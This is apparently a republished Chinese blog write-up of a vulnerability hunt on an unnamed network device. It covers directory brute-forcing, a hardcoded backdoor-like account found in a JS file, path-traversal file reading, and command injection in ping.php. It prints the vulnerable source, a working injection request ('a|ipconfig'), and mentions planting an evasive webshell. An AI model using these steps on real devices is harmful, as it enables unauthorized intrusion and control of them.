首页 » SEO优化 » php运行ping源码技巧_某设备产品马脚挖掘从JS文件挖掘RCE

php运行ping源码技巧_某设备产品马脚挖掘从JS文件挖掘RCE

访客 2024-11-21 0

扫一扫用手机浏览

文章目录 [+]

信息网络

【私信我获取网络安全学习资料·攻略】

2000多本网络安全系列电子书

php运行ping源码技巧_某设备产品马脚挖掘从JS文件挖掘RCE

网络安全标准题库资料

php运行ping源码技巧_某设备产品马脚挖掘从JS文件挖掘RCE
(图片来自网络侵删)

项目源码

网络安全根本入门、Linux、web安全、攻防方面的视频

网络安全学习路线图

首先拿到了目标,同样也须要对设备进行信息网络,登录页面有滑块验证和账号密码要求包加密

暂时先放弃从JS里获取密码加密方法,先考试测验找一些接口来获取信息,查看源代码

访问一下JS目录,这里有一个小技巧,当目录存在时会自动在后面加上 /, 例如浏览器访问 /js, 将会变成 /js/ 来访问

https://xxx.xxx.xxx.xxx/js

这里大略测试一下创造存在的目录可以通过判断403来确定目录的存在,对下一步文件爆破供应帮助,这里利用Gobuster进行爆破

获取到的存在的目录信息

/js/ (Status: 403)/lan/ (Status: 403)/php/ (Status: 403)/images/ (Status: 403)/html/ (Status: 403)/vendors/ (Status: 403)/upload/ (Status: 403)

我们须要把稳的为 js 与 php 目前录下的文件,才可能存在打破口,首先爆破 js目录下的 js文件

获取后通过爬虫遍历 JS文件下载到本地翻阅,个中创造 /js/index.js 文件中有敏感信息,猜想可能是后门账号或者默认密码

拿着拿到的账号去登录一下试试

成功登录目标系统,目标用户为 administrator, 查看存在的用户创造这个可能是后门账户

漏洞挖掘任意文件读取漏洞 (exportrecord.php)

目前我们已经获取到了目标的后台管理权限,且权限比较高,我们可以连续测试漏洞之前爆破到了 php目录,预测为功能性文件,我们可以通过 js文件中的信息获取一些文件名和接口信息

这里在 backup.js 文件中创造一个有关的下载接口

function downloadBak(index) { var data = $('#backupList').bootstrapTable("getData"); if (index >= 0 && index < data.length) { var downurl = '../php/exportrecord.php?downname=' + data[index].id; window.open(downurl); }}

预测 downname参数为文件名,测试能不能下载文件

/php/exportrecord.php?downname=exportrecord.php

这里得到了 /php/exportrecord.php 文件

传入downname参数,没有对 ../ 符号过滤,就导致跳目录读取文件现在我们有了一个任意文件读取,我们再通过目录爆破获取更多的PHP文件源码

远程命令实行漏洞 (ping.php)

通过刚刚到目录爆破我们看到一个非常值得把稳的文件 ping.php,设备中常见的网络联通性测试文件,也是设备中常见的漏洞点, 通过文件读取漏洞读取文件

function systemopr($type, $ip, $times=4){ $info = array(); if (PATH_SEPARATOR==':' || DIRECTORY_SEPARATOR=='/'){ //linux if($type == "0"){ exec("ping -c $times $ip", $info); }else if($type == "1"){ exec("traceroute -m $times -w 1 $ip", $info); }else{ exec($ip, $info); } }else{ //windows if($type == "0"){ exec("ping $ip -n $times", $info); }else if($type == "1"){ exec("tracert -h $times -w 1000 $ip", $info); }else{ exec($ip, $info); } } return $info;}?>

这里可以看到这里吸收的参数 jsondata数组中的 ip参数,用户可以造成命令拼接,而且通过 exec 实行,并且会 return到页面中,导致回显的RCE

POST /php/ping.phpjsondata[ip]=a|ipconfig&jsondata[type]=1

目标为Windows系统,测试写入phpinfo文件

写入免杀并流量加密的Webshell,考试测验获取目标设备权限

末了

点击查看【网络安全学习资料·攻略】,私信我获取网络安全学习资料

标签:

相关文章

天龙八部协议,构建数字经济的基石

随着互联网技术的飞速发展,数字经济逐渐成为全球经济增长的新引擎。为了促进数字经济的高质量发展,我国政府高度重视,积极推动相关政策的...

SEO优化 2024-12-27 阅读0 评论0

天禾协议,引领农业科技革命的新引擎

随着科技的高速发展,我国农业产业也迎来了前所未有的变革。在这个背景下,天禾协议应运而生,成为推动农业科技革命的新引擎。本文将围绕天...

SEO优化 2024-12-27 阅读0 评论0

奇盾安防协议,构建安全网络环境的新篇章

随着互联网技术的飞速发展,网络安全问题日益突出。为了应对日益严峻的网络安全挑战,我国政府及相关部门高度重视网络安全防护工作,制定了...

SEO优化 2024-12-27 阅读0 评论0

探索slumit,数字化时代的智慧社区新范式

随着科技的飞速发展,我国城市化进程不断加速,社区作为城市的基本单元,面临着前所未有的挑战和机遇。在数字化浪潮中,如何构建智慧社区成...

SEO优化 2024-12-27 阅读0 评论0